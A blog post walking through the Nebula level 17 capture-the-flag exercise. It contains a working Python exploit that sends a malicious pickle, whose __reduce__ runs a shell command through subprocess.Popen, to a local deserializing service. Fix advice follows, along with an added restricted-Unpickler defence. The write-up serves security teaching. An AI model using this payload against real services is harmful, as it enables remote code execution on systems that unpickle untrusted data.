blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 17

Problem

  1. Data from untrusted sources is accepted!
  2. A library (pickle) is used that is known to execute code contained in the data it loads.

Please see blog.nelhage.com for more information.

Exploit

The exploit is straightforward if you have read the blog entry linked above.

#!/usr/bin/python
# Python 2, as shipped on the Nebula VM

import subprocess
import socket
import pickle

cmd = 'getflag >/tmp/flag17'

# pickle.loads() on the server side calls whatever __reduce__ returns:
# the callable (here subprocess.Popen) applied to the given argument tuple.
class Getflag(object):
    def __reduce__(self):
        return (subprocess.Popen, ((cmd,),))

host = '127.0.0.1'
port = 10007

o = Getflag()
pickled_o = pickle.dumps(o)
print pickled_o

# Connect to the level 17 service, read its banner and send the payload,
# which is unpickled (and therefore executed) by the server.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.connect((host, port))
res = s.recv(1024)
s.send(pickled_o)
s.close()

To see the flag, just run cat /tmp/flag17.

Lesson / How to fix

  1. Only accept data from trusted sources!
  2. Read the documentation! It is vital to understand the API of every library your source code uses.
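As an added illustration of the fix (not code from the original post or from the Nebula level), the following Python 3 snippet shows why plain pickle.loads is the bug and how a restricted unpickler refuses a __reduce__-based payload before any callable is invoked. The ReduceDemo class is a constructed stand-in for the post's Getflag class that names the harmless os.getcwd instead of subprocess.Popen; the allowlist ALLOWED_GLOBALS is an assumption for the demo.

```python
#!/usr/bin/env python3
"""Rejecting code-executing pickles with a restricted Unpickler."""
import collections
import io
import os
import pickle

# Constructed stand-in for the post's Getflag payload: __reduce__ names a
# global callable, so an unrestricted pickle.loads() will call it.
class ReduceDemo:
    def __reduce__(self):
        return (os.getcwd, ())  # harmless here; the post used subprocess.Popen

# Assumed allowlist: the only module.name globals the application needs.
# subprocess.Popen, os.system, posix.getcwd, ... are all refused.
ALLOWED_GLOBALS = frozenset({("collections", "deque")})

class RestrictedUnpickler(pickle.Unpickler):
    # find_class() is consulted for every GLOBAL/STACK_GLOBAL opcode,
    # i.e. before the REDUCE opcode could call anything.
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))

def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def demo():
    payload = pickle.dumps(ReduceDemo())
    # The unsafe path: loading the payload executes the named callable.
    ran_callable = pickle.loads(payload) == os.getcwd()
    # The hardened path: the same payload is refused, nothing is called.
    try:
        safe_loads(payload)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    # Ordinary data and allowlisted types still round-trip.
    plain = safe_loads(pickle.dumps({"level": 17, "tags": ["pickle", "rce"]}))
    queue = safe_loads(pickle.dumps(collections.deque([1, 2, 3])))
    return {
        "unrestricted_ran_callable": ran_callable,
        "restricted_blocked": blocked,
        "plain_roundtrip": plain,
        "deque_roundtrip": list(queue),
    }

if __name__ == "__main__":
    print(demo())
```

The cleaner fix for a network service is to not unpickle untrusted bytes at all and use a data-only format such as JSON; the allowlist is a containment measure where pickle cannot be removed.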
